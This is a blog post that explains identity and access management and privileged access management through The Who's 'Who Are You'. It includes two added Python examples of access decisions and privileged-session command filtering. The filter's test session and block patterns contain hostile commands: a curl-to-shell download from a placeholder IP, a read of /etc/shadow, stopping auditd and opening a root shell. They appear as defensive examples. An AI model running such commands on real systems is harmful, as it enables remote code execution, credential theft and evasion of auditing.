Tue | Dec 5, 2017 | 8:45 AM PST

In 1978 The Who released the rock classic “Who Are You.” The song stands as one of the best the band ever recorded, and its title poses the fundamental question of today’s next generation economy: who are you?

Today we try to solve that problem with technology, Identity and Access Management solutions, which attempt to verify that an identity, an account, and the context of a request all line up with who you really are.

Bad puns aside, “who are you” was a challenge long before modern information technology, and we still wrestle with positive identification today, even though the moral of the song was more about your personality and soul than authentication to a resource. Step back for a moment, though, and we are still asking the same fundamental question: who are you?

Are you who I think you are, and are you who you claim to be? Not so far-fetched a question if you are a threat actor with malicious intent, or a person living a life of hypocrisy and lies. Right?

My point is that we were dealing with identity crises long before modern authentication techniques, and even a person from the 70s might have shown a different person on the outside than the one on the inside, with different intent. Fortunately, we will never hear a song called “Identity and Access Management,” but it does make for a good blog, so please read on.

Identity and Access Management starts by taking a human being, a carbon-based life form, and establishing a one-to-one relationship between that person and an identity. This is who you are.

Every identity, however, can have multiple aliases (variations such as a nickname) and multiple accounts, each with its own credentials used for authentication. Therefore, you have one and only one identity, and potentially many accounts and aliases that represent you.

Next, you have your access.

Each account can have different access controls per resource and per context. That means one account can have access to an asset or application while another account associated with the same identity does not; a standard user account and a separate administrator account for the same person is the classic case. Managing those elevated accounts and what they are allowed to do is typically referred to as privileged access management, which leading analysts define as a subset of identity and access management.

Finally, there is context.

Either of those accounts may be allowed to work from one geolocation, at one time and date, or against one resource, but not another. This places access restrictions on the resource based on everything from the source of the request to the risk of the connection and of the initiating device.

Network Access Control, Virtual Private Networks, Access Control Lists, and Multifactor Authentication are typically used to help provide context for access decisions. Together, they form the backbone for establishing that who you claim to be is actually who you are. Get it?

If not, think of the old Memorex tape commercial. The key line was, “Is it live, or is it Memorex?” It questioned whether the audio was actually a live person or a recording.

Using context to help verify access is the same thing. Was that request a bot, malware, or a real person I trust, from a trusted computer, at an expected time? Hopefully that helps, and I did not date myself too badly, which is actually an entirely different problem for identity and access management: stale accounts.

So how does identity and access management translate to businesses today? I am glad you asked.

It is the procedural, policy-driven implementation of technology and workflow to manage the “who” aspect of your identities and accounts. It allows you to automate the creation of an identity and its associated technology accounts (credentials), and to define every aspect of access policy for assets, applications, and other information technology resources.

At any given time, you can query an identity and access management solution for who has access to what, and for exactly what access a given identity has been assigned. This is key for regulatory compliance auditing.
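To make the identity, account, access and context relationship above concrete, along with the “who has access to what” audit query that follows from it, here is an added example in Python. It is not code from the original post or from any IAM product: the identity, the two accounts, the resources, the country and time-window rules and the sample requests are all constructed for illustration, and the policy evaluation is a deliberately simple deny-by-default check rather than any particular vendor’s logic.

```python
"""Toy identity / account / entitlement model with context-aware access
decisions and a "who has access to what" audit query. Added example, not code
from the original post or from any IAM product; every identity, account,
resource and policy rule below is constructed for illustration."""
from dataclasses import dataclass
from datetime import datetime, time


@dataclass(frozen=True)
class Identity:
    """Exactly one per person; aliases are other names for the same identity."""
    id: str
    display_name: str
    aliases: frozenset = frozenset()


@dataclass(frozen=True)
class Account:
    """A credential set that represents an identity on some system."""
    name: str
    identity_id: str
    privileged: bool = False


@dataclass(frozen=True)
class Entitlement:
    """One account's access to one resource, and the context it is valid in."""
    account: str
    resource: str
    allowed_countries: frozenset
    window: tuple                   # (start, end) time of day at the resource
    require_trusted_device: bool = True
    require_mfa: bool = False


@dataclass(frozen=True)
class Request:
    """What the access decision sees: the account plus the context of the call."""
    account: str
    resource: str
    country: str
    at: datetime
    device_trusted: bool
    mfa_passed: bool


# Constructed directory: one identity, two accounts (standard and admin).
IDENTITIES = {"i-1001": Identity("i-1001", "Jane Doe", frozenset({"jdoe", "janie"}))}
ACCOUNTS = {
    "jdoe": Account("jdoe", "i-1001"),
    "jdoe-adm": Account("jdoe-adm", "i-1001", privileged=True),
}
ENTITLEMENTS = [
    Entitlement("jdoe", "crm-app", frozenset({"US", "GB"}), (time(0, 0), time(23, 59))),
    Entitlement("jdoe-adm", "prod-db", frozenset({"US"}), (time(8, 0), time(18, 0)),
                require_mfa=True),
]


def decide(req):
    """Return (allowed, reason). Deny by default; each failed check names itself."""
    if req.account not in ACCOUNTS:
        return False, "unknown account"
    for e in ENTITLEMENTS:
        if e.account != req.account or e.resource != req.resource:
            continue
        if req.country not in e.allowed_countries:
            return False, "geolocation not permitted"
        start, end = e.window
        if not start <= req.at.time() <= end:
            return False, "outside permitted time window"
        if e.require_trusted_device and not req.device_trusted:
            return False, "untrusted device"
        if e.require_mfa and not req.mfa_passed:
            return False, "MFA required"
        return True, "ok"
    return False, "no entitlement"


def access_report(identity_id):
    """Audit query: every resource each of this identity's accounts can reach."""
    return {a.name: sorted(e.resource for e in ENTITLEMENTS if e.account == a.name)
            for a in ACCOUNTS.values() if a.identity_id == identity_id}


def who_has_access(resource):
    """Reverse audit query: (identity, account) pairs entitled to a resource."""
    return sorted((ACCOUNTS[e.account].identity_id, e.account)
                  for e in ENTITLEMENTS if e.resource == resource)


# Constructed requests: the same admin account under different contexts.
SAMPLE_REQUESTS = {
    "in-hours-mfa":  Request("jdoe-adm", "prod-db", "US", datetime(2017, 12, 5, 8, 45), True, True),
    "no-mfa":        Request("jdoe-adm", "prod-db", "US", datetime(2017, 12, 5, 8, 45), True, False),
    "wrong-country": Request("jdoe-adm", "prod-db", "GB", datetime(2017, 12, 5, 8, 45), True, True),
    "after-hours":   Request("jdoe-adm", "prod-db", "US", datetime(2017, 12, 5, 23, 0), True, True),
    "other-account": Request("jdoe", "prod-db", "US", datetime(2017, 12, 5, 8, 45), True, True),
}


def evaluate_samples():
    """Decision for each constructed request, keyed by its label."""
    return {label: decide(req) for label, req in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for label, (ok, why) in evaluate_samples().items():
        print(f"{label:14} {'ALLOW' if ok else 'DENY':5} {why}")
    print(access_report("i-1001"), who_has_access("prod-db"))
```

The point of the two report functions is the compliance question in the text: `access_report` answers what one identity can reach across all of its accounts, and `who_has_access` answers it from the resource side. The decision function refuses everything it does not have an explicit entitlement and matching context for, and names the failing check so the denial itself is auditable.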

What the “who” does not tell you, in this context, is what the identity and its accounts actually did with their access permissions.

This is where privileged access management comes in. It provides the session recording, keystroke logging, application monitoring, and command-line filtering that document what the identity and account actually did with a resource, which lets you answer whether those actions were appropriate.
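As an added illustration of the command-line filtering and session audit trail just described (not code from the original post or from any PAM product), here is a toy Python filter for a privileged session: it allow-lists base commands, blocks dangerous argument patterns and shell chaining, and logs every decision against the identity behind the account. The allow list, the blocked patterns, the account names and the recorded session are all constructed assumptions.

```python
"""Toy privileged-session command filter with an identity-level audit trail.
Added example, not code from the original post or from any PAM product; the
allow list, the blocked patterns, the account names and the sample session
are all constructed for illustration."""
import re
import shlex

# Deny by default: only these base commands may run in a filtered session.
ALLOWED_COMMANDS = {"ls", "cat", "tail", "systemctl", "journalctl", "sudo"}

# Argument patterns blocked even though the base command is allowed. Matched
# against the shlex-parsed and re-joined command line, so quoting the path
# does not evade the check.
BLOCKED_PATTERNS = [
    (re.compile(r"^(cat|tail) .*/etc/shadow\b"), "credential store read"),
    (re.compile(r"^systemctl (stop|disable|mask) auditd\b"), "tamper with audit daemon"),
    (re.compile(r"^sudo (su|-i|-s|bash|sh)\b"), "unfiltered interactive root shell"),
]

# Shell operators that would let an allowed command chain, pipe into or
# substitute an unfiltered one. Refuse them outright instead of parsing them.
CHAINING = re.compile(r"[;&|`<>]|\$\(|\$\{")


def filter_command(identity, account, ts, cmdline, log):
    """Decide whether one command line may run and record the decision.

    Returns True if allowed. Every command, allowed or denied, is appended to
    `log` together with the identity behind the account, so the trail answers
    "what did this person do" and not only "what did this account do".
    """
    def record(allowed, reason):
        log.append({"ts": ts, "identity": identity, "account": account,
                    "command": cmdline, "allowed": allowed, "reason": reason})
        return allowed

    if CHAINING.search(cmdline):
        return record(False, "shell chaining or substitution")
    try:
        argv = shlex.split(cmdline)
    except ValueError:                      # e.g. unbalanced quotes
        return record(False, "unparseable command line")
    if not argv:
        return record(False, "empty command")
    if argv[0] not in ALLOWED_COMMANDS:
        return record(False, f"command not in allow list: {argv[0]}")
    normalized = " ".join(argv)
    for pattern, why in BLOCKED_PATTERNS:
        if pattern.search(normalized):
            return record(False, why)
    return record(True, "ok")


# Constructed session transcript: (identity, account, timestamp, command line).
SAMPLE_SESSION = [
    ("i-1001", "jdoe-adm", "2017-12-05T16:45:00Z", "ls -la /var/log"),
    ("i-1001", "jdoe-adm", "2017-12-05T16:45:20Z", "tail -n 50 /var/log/syslog"),
    ("i-1001", "jdoe-adm", "2017-12-05T16:46:05Z", 'cat "/etc/shadow"'),
    ("i-1001", "jdoe-adm", "2017-12-05T16:46:30Z", "systemctl stop auditd"),
    ("i-1001", "jdoe-adm", "2017-12-05T16:47:00Z", "ls /tmp; curl http://203.0.113.9/x | sh"),
    ("i-1001", "jdoe-adm", "2017-12-05T16:47:30Z", "sudo su -"),
]


def replay(session):
    """Run every line of a recorded session through the filter; return the log."""
    log = []
    for identity, account, ts, cmdline in session:
        filter_command(identity, account, ts, cmdline, log)
    return log


def denied_by_identity(log):
    """Audit roll-up keyed by identity, not account: what did this person try?"""
    out = {}
    for entry in log:
        if not entry["allowed"]:
            out.setdefault(entry["identity"], []).append((entry["command"], entry["reason"]))
    return out


if __name__ == "__main__":
    for entry in replay(SAMPLE_SESSION):
        verdict = "ALLOW" if entry["allowed"] else "DENY "
        print(f"{entry['ts']} {entry['identity']}/{entry['account']} {verdict} "
              f"{entry['command']!r}: {entry['reason']}")
```

Running it prints the six recorded commands with their verdicts. Two design choices matter: the filter refuses any line containing shell chaining or substitution rather than trying to parse it, because an allowed `ls` followed by `;` would otherwise smuggle in whatever comes next; and the roll-up is keyed by identity rather than account, which is what lets the audit answer what Jane did across every account she holds.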

It also takes us back to our song. Identity and access management tells you who you are and what you can do. Privileged access management answers the deeper question of what you really did, and whether your intentions were honest, truthful, and not malicious.

So the next time you hear The Who, or think about Identity and Access Management, remember this relationship. It can tell you who someone is, but to really know their intentions, you need to dig deeper and monitor their activity as well.

No identity or account should ever be taken at face value without context and the ability to audit and monitor its behavior, to confirm that it is what it claims to be and that its intentions are honorable.
